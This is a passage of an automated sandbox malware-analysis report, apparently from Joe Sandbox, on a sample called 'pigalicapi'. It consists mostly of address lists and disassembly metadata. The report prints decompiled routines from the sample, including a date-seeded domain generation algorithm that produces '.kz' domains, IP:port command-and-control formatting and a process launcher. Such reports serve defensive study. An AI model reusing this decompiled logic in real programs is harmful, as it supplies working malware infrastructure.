                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401fa6
                                                                                                                                                                                                                                                                          0x00401fa6
                                                                                                                                                                                                                                                                          0x00401fa6
                                                                                                                                                                                                                                                                          0x00401fab
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401fab
                                                                                                                                                                                                                                                                          0x00401f3f
                                                                                                                                                                                                                                                                          0x00401f3f
                                                                                                                                                                                                                                                                          0x00401f47
                                                                                                                                                                                                                                                                          0x00401f54
                                                                                                                                                                                                                                                                          0x00401f5a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401f5c
                                                                                                                                                                                                                                                                          0x00401f64
                                                                                                                                                                                                                                                                          0x00401f64
                                                                                                                                                                                                                                                                          0x00401f6d
                                                                                                                                                                                                                                                                          0x00401f77
                                                                                                                                                                                                                                                                          0x00401f7c
                                                                                                                                                                                                                                                                          0x00401f7f
                                                                                                                                                                                                                                                                          0x00401f8e
                                                                                                                                                                                                                                                                          0x00401f8e
                                                                                                                                                                                                                                                                          0x00401f49
                                                                                                                                                                                                                                                                          0x00401f49
                                                                                                                                                                                                                                                                          0x00401f51
                                                                                                                                                                                                                                                                          0x00401f90
                                                                                                                                                                                                                                                                          0x00401f98
                                                                                                                                                                                                                                                                          0x00401fad
                                                                                                                                                                                                                                                                          0x00401fad
                                                                                                                                                                                                                                                                          0x00401fad
                                                                                                                                                                                                                                                                          0x00401fb3
                                                                                                                                                                                                                                                                          0x004020bb
                                                                                                                                                                                                                                                                          0x004020bf
                                                                                                                                                                                                                                                                          0x004020c6
                                                                                                                                                                                                                                                                          0x004020cc
                                                                                                                                                                                                                                                                          0x004020d7
                                                                                                                                                                                                                                                                          0x004020db
                                                                                                                                                                                                                                                                          0x004020e0
                                                                                                                                                                                                                                                                          0x004020e2
                                                                                                                                                                                                                                                                          0x004020ea
                                                                                                                                                                                                                                                                          0x004020f0
                                                                                                                                                                                                                                                                          0x004020f3
                                                                                                                                                                                                                                                                          0x004020f8
                                                                                                                                                                                                                                                                          0x00401fb9
                                                                                                                                                                                                                                                                          0x00401fb9
                                                                                                                                                                                                                                                                          0x00401fc2
                                                                                                                                                                                                                                                                          0x00401fc8
                                                                                                                                                                                                                                                                          0x00401fcd
                                                                                                                                                                                                                                                                          0x00401fcd
                                                                                                                                                                                                                                                                          0x00401fd0
                                                                                                                                                                                                                                                                          0x00401fd2
                                                                                                                                                                                                                                                                          0x00401fd2
                                                                                                                                                                                                                                                                          0x00401fd8
                                                                                                                                                                                                                                                                          0x00401fdb
                                                                                                                                                                                                                                                                          0x00401fe4
                                                                                                                                                                                                                                                                          0x0040202c
                                                                                                                                                                                                                                                                          0x00402035
                                                                                                                                                                                                                                                                          0x004020a0
                                                                                                                                                                                                                                                                          0x004020a9
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401fe6
                                                                                                                                                                                                                                                                          0x00401fe9
                                                                                                                                                                                                                                                                          0x00402070
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401feb
                                                                                                                                                                                                                                                                          0x00401fee
                                                                                                                                                                                                                                                                          0x00401ff0
                                                                                                                                                                                                                                                                          0x00401ff7
                                                                                                                                                                                                                                                                          0x00401ffb
                                                                                                                                                                                                                                                                          0x00402002
                                                                                                                                                                                                                                                                          0x00402002
                                                                                                                                                                                                                                                                          0x00402008
                                                                                                                                                                                                                                                                          0x00402011
                                                                                                                                                                                                                                                                          0x00402037
                                                                                                                                                                                                                                                                          0x00402037
                                                                                                                                                                                                                                                                          0x00402043
                                                                                                                                                                                                                                                                          0x00402049
                                                                                                                                                                                                                                                                          0x004020ac
                                                                                                                                                                                                                                                                          0x004020b4
                                                                                                                                                                                                                                                                          0x0040204b
                                                                                                                                                                                                                                                                          0x0040204e
                                                                                                                                                                                                                                                                          0x00402073
                                                                                                                                                                                                                                                                          0x0040207b
                                                                                                                                                                                                                                                                          0x00402050
                                                                                                                                                                                                                                                                          0x00402053
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00402053
                                                                                                                                                                                                                                                                          0x0040204e
                                                                                                                                                                                                                                                                          0x00402013
                                                                                                                                                                                                                                                                          0x0040201b
                                                                                                                                                                                                                                                                          0x00402024
                                                                                                                                                                                                                                                                          0x00402055
                                                                                                                                                                                                                                                                          0x0040205d
                                                                                                                                                                                                                                                                          0x0040205d
                                                                                                                                                                                                                                                                          0x00402011
                                                                                                                                                                                                                                                                          0x00401fe9
                                                                                                                                                                                                                                                                          0x00402080
                                                                                                                                                                                                                                                                          0x00402083
                                                                                                                                                                                                                                                                          0x00402088
                                                                                                                                                                                                                                                                          0x00402090
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401fc2
                                                                                                                                                                                                                                                                          0x00401f9a
                                                                                                                                                                                                                                                                          0x00401f9a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401f9a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401f51
                                                                                                                                                                                                                                                                          0x00401f47
                                                                                                                                                                                                                                                                          0x00401f3d
                                                                                                                                                                                                                                                                          0x00401f12
                                                                                                                                                                                                                                                                          0x00401f12
                                                                                                                                                                                                                                                                          0x00401f19
                                                                                                                                                                                                                                                                          0x00401f19
                                                                                                                                                                                                                                                                          0x00401e60
                                                                                                                                                                                                                                                                          0x00401e60
                                                                                                                                                                                                                                                                          0x00401e66
                                                                                                                                                                                                                                                                          0x00401ee7
                                                                                                                                                                                                                                                                          0x00401e6d
                                                                                                                                                                                                                                                                          0x00401e6d
                                                                                                                                                                                                                                                                          0x00401e70
                                                                                                                                                                                                                                                                          0x00401e74
                                                                                                                                                                                                                                                                          0x00401e7f
                                                                                                                                                                                                                                                                          0x00401e86
                                                                                                                                                                                                                                                                          0x00401e89
                                                                                                                                                                                                                                                                          0x00401e8c
                                                                                                                                                                                                                                                                          0x00401e8f
                                                                                                                                                                                                                                                                          0x00401e9f
                                                                                                                                                                                                                                                                          0x00401e9f
                                                                                                                                                                                                                                                                          0x00401ea4
                                                                                                                                                                                                                                                                          0x00401ea7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401eb2
                                                                                                                                                                                                                                                                          0x00401eb2
                                                                                                                                                                                                                                                                          0x00401eb9
                                                                                                                                                                                                                                                                          0x00401ec0
                                                                                                                                                                                                                                                                          0x00401ec7
                                                                                                                                                                                                                                                                          0x00401ed9
                                                                                                                                                                                                                                                                          0x00401ed9
                                                                                                                                                                                                                                                                          0x00401ea7
                                                                                                                                                                                                                                                                          0x00401e66
                                                                                                                                                                                                                                                                          0x00401e2d
                                                                                                                                                                                                                                                                          0x00401e2d
                                                                                                                                                                                                                                                                          0x00401e34
                                                                                                                                                                                                                                                                          0x00401e34

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.558505777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558382730.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558681103.0000000000404000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558864837.0000000000406000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559037175.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559758809.0000000000420000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Virtual$Protect$Query
                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                          • API String ID: 3618607426-2766056989
                                                                                                                                                                                                                                                                          • Opcode ID: f09473ca4629ddbfdfb1bbf95e45a330cf630b9b0dbe34dad6cf56d79bdec4c4
                                                                                                                                                                                                                                                                          • Instruction ID: 06f0d9e29b35e3b38f917c532443f2a712c509407963492828fb5f3299beb3b6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f09473ca4629ddbfdfb1bbf95e45a330cf630b9b0dbe34dad6cf56d79bdec4c4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1310BB5D04204AFDB14EFA9D48559EFBF4EB88354F10852EE958E3390E375D840CB96
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040092E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				struct _SYSTEMTIME _v28;
                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				char _v172;
                                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                                                                                          				void* _t83;
                                                                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                                                                                                                                          					GetLocalTime( &_v28);
                                                                                                                                                                                                                                                                          					_t46 = E040097E0(_v28.wMonth & 0x0000ffff, _v28.wYear & 0x0000ffff, _v28.wMonth & 0x0000ffff, _v28.wDay & 0x0000ffff);
                                                                                                                                                                                                                                                                          					_t84 = _t83 + 0xc;
                                                                                                                                                                                                                                                                          					_v12 = _t46 + _a12;
                                                                                                                                                                                                                                                                          					_v32 = 0;
                                                                                                                                                                                                                                                                          					while(_v32 < _a8) {
                                                                                                                                                                                                                                                                          						E04007D20( &_v172,  &_v172, 0, 0x80);
                                                                                                                                                                                                                                                                          						_t50 = E04008BB0( &_v12, 4,  &_v172, 0x80);
                                                                                                                                                                                                                                                                          						_t86 = _t84 + 0x1c;
                                                                                                                                                                                                                                                                          						_v40 = _t50;
                                                                                                                                                                                                                                                                          						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                          							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v12 = _v172;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                          						E04009650( &_v172, _v40, _v32 * 0x28 + _a4, _v36);
                                                                                                                                                                                                                                                                          						_t84 = _t86 + 0x10;
                                                                                                                                                                                                                                                                          						lstrcatA(_v32 * 0x28 + _a4, ".kz");
                                                                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                          						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                          0x040092e9
                                                                                                                                                                                                                                                                          0x040092f4
                                                                                                                                                                                                                                                                          0x04009308
                                                                                                                                                                                                                                                                          0x0400931d
                                                                                                                                                                                                                                                                          0x04009322
                                                                                                                                                                                                                                                                          0x04009328
                                                                                                                                                                                                                                                                          0x0400932b
                                                                                                                                                                                                                                                                          0x0400933d
                                                                                                                                                                                                                                                                          0x04009357
                                                                                                                                                                                                                                                                          0x04009371
                                                                                                                                                                                                                                                                          0x04009376
                                                                                                                                                                                                                                                                          0x04009379
                                                                                                                                                                                                                                                                          0x04009380
                                                                                                                                                                                                                                                                          0x04009396
                                                                                                                                                                                                                                                                          0x04009382
                                                                                                                                                                                                                                                                          0x04009388
                                                                                                                                                                                                                                                                          0x04009388
                                                                                                                                                                                                                                                                          0x040093a8
                                                                                                                                                                                                                                                                          0x040093c4
                                                                                                                                                                                                                                                                          0x040093c9
                                                                                                                                                                                                                                                                          0x040093db
                                                                                                                                                                                                                                                                          0x040093e7
                                                                                                                                                                                                                                                                          0x040093f0
                                                                                                                                                                                                                                                                          0x0400933a
                                                                                                                                                                                                                                                                          0x0400933a
                                                                                                                                                                                                                                                                          0x0400933d
                                                                                                                                                                                                                                                                          0x040093fe

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 04009308
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,.kz), ref: 040093DB
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastLocalReleaseTimelstrcat
                                                                                                                                                                                                                                                                          • String ID: .kz
                                                                                                                                                                                                                                                                          • API String ID: 2740484991-4216035510
                                                                                                                                                                                                                                                                          • Opcode ID: 28f090440165364d74cfd4a48749ec745bc8846a55d0f1667de3e46dcaf07841
                                                                                                                                                                                                                                                                          • Instruction ID: bb0d42d70b93f9fb2e2ab601979b3322a165a8cda29c6817b22e5740edda4972
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28f090440165364d74cfd4a48749ec745bc8846a55d0f1667de3e46dcaf07841
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D310AB1E00209EBEF08DF94C885BEEB7B5EF58304F10C159E515B7281E678AA85CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 10002468
                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 100024B2
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.606973844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                          • API String ID: 544645111-2766056989
                                                                                                                                                                                                                                                                          • Opcode ID: af73fc3a835f5cb9a27c40e94a700fe6bd6fe7a21d246ca72f0d591094e94dd8
                                                                                                                                                                                                                                                                          • Instruction ID: 1bc0fa0ef2482510480b6d00c0adc5d74525c4f8bff966f143e9313f40c37061
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af73fc3a835f5cb9a27c40e94a700fe6bd6fe7a21d246ca72f0d591094e94dd8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C21DEB0905249EFEF14CF94C984BAEBBB5FF44384F208599D909A7248C774AF80DB51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                                                                          			E040078D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 >= _a8) {
                                                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                                                          					while(_v16 < _a8) {
                                                                                                                                                                                                                                                                          						_t31 = E04007B70( &_v12, _v16 * 6 + _a4, 4);
                                                                                                                                                                                                                                                                          						_push(_v12);
                                                                                                                                                                                                                                                                          						L0400B1EC();
                                                                                                                                                                                                                                                                          						_v20 = _t31;
                                                                                                                                                                                                                                                                          						wnsprintfA(_v16 * 0x28 + _a12, 0x28, "%s:%u", _v20,  *(_a4 + 4 + _v16 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                                          						_t46 = _t46 + 0x20;
                                                                                                                                                                                                                                                                          						_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v5 = 1;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                          0x040078d6
                                                                                                                                                                                                                                                                          0x040078de
                                                                                                                                                                                                                                                                          0x040078f8
                                                                                                                                                                                                                                                                          0x0400790a
                                                                                                                                                                                                                                                                          0x04007922
                                                                                                                                                                                                                                                                          0x0400792d
                                                                                                                                                                                                                                                                          0x0400792e
                                                                                                                                                                                                                                                                          0x04007933
                                                                                                                                                                                                                                                                          0x0400795a
                                                                                                                                                                                                                                                                          0x04007960
                                                                                                                                                                                                                                                                          0x04007907
                                                                                                                                                                                                                                                                          0x04007907
                                                                                                                                                                                                                                                                          0x04007965
                                                                                                                                                                                                                                                                          0x04007965
                                                                                                                                                                                                                                                                          0x0400796f

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: inet_ntoawnsprintf
                                                                                                                                                                                                                                                                          • String ID: %s:%u
                                                                                                                                                                                                                                                                          • API String ID: 890441721-1474915593
                                                                                                                                                                                                                                                                          • Opcode ID: 45e21c9532a10fe3660936149e330ed9fd96ba08dfcacbd0c7ca049c9e07423d
                                                                                                                                                                                                                                                                          • Instruction ID: 46ead0e7315176c8e7c3a96679b7c8ac73bfa04a13e8ca702a559205f2d732b6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45e21c9532a10fe3660936149e330ed9fd96ba08dfcacbd0c7ca049c9e07423d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05115B71A04208ABEB08CF94C995BEDBBB4EB50308F04C29DE915BB280D379F645CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04001E60(CHAR* _a4) {
                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA _v100;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                          					E04007D20(E04007D20( &_v24,  &_v24, 0, 0x10),  &_v100, 0, 0x44);
                                                                                                                                                                                                                                                                          					_v100.cb = 0x44;
                                                                                                                                                                                                                                                                          					if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24) != 0) {
                                                                                                                                                                                                                                                                          						CloseHandle(_v24.hThread);
                                                                                                                                                                                                                                                                          						_v8 = _v24.hProcess;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                                                                          0x04001e66
                                                                                                                                                                                                                                                                          0x04001e71
                                                                                                                                                                                                                                                                          0x04001e8b
                                                                                                                                                                                                                                                                          0x04001e93
                                                                                                                                                                                                                                                                          0x04001ebc
                                                                                                                                                                                                                                                                          0x04001ec2
                                                                                                                                                                                                                                                                          0x04001ecb
                                                                                                                                                                                                                                                                          0x04001ecb
                                                                                                                                                                                                                                                                          0x04001ebc
                                                                                                                                                                                                                                                                          0x04001ed4

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 04001EB4
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04001EC2
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                                          • API String ID: 3712363035-2746444292
                                                                                                                                                                                                                                                                          • Opcode ID: 59bcdaf37b1f271a783006bdc6eef328790e49f0bf96139ab545fec0931b98cd
                                                                                                                                                                                                                                                                          • Instruction ID: 8c18c5092416b0968d1e58d42d3dcefe862203e4accbbf984a8d418911b9581a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59bcdaf37b1f271a783006bdc6eef328790e49f0bf96139ab545fec0931b98cd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C011275A4420CABEB10DF90DD45FEE77B9AB04704F148119E6087B2C0D775AA45C7A1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.558505777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558382730.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558681103.0000000000404000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558864837.0000000000406000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559037175.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559758809.0000000000420000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeavefree
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4020351045-0
                                                                                                                                                                                                                                                                          • Opcode ID: 711738e446fe3b7edafeffa79fbdd3347046ec6280da55ba19de0ab90e35ac8b
                                                                                                                                                                                                                                                                          • Instruction ID: 24174dcb29c75eb10321d4f28545725da20b22b3dd9ddbd94471567b296ec203
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 711738e446fe3b7edafeffa79fbdd3347046ec6280da55ba19de0ab90e35ac8b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D011B703042069BCB00EF75DA8892FB7E5BB54308754847E9848B73C1E6BCD980DB99
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,004023C1,?,?,?,?,?,00401C54), ref: 0040224B
                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,004023C1,?,?,?,?,?,00401C54), ref: 00402261
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,004023C1,?,?,?,?,?,00401C54), ref: 00402269
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,004023C1,?,?,?,?,?,00401C54), ref: 0040228C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.558505777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558382730.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558681103.0000000000404000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558864837.0000000000406000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559037175.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559758809.0000000000420000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
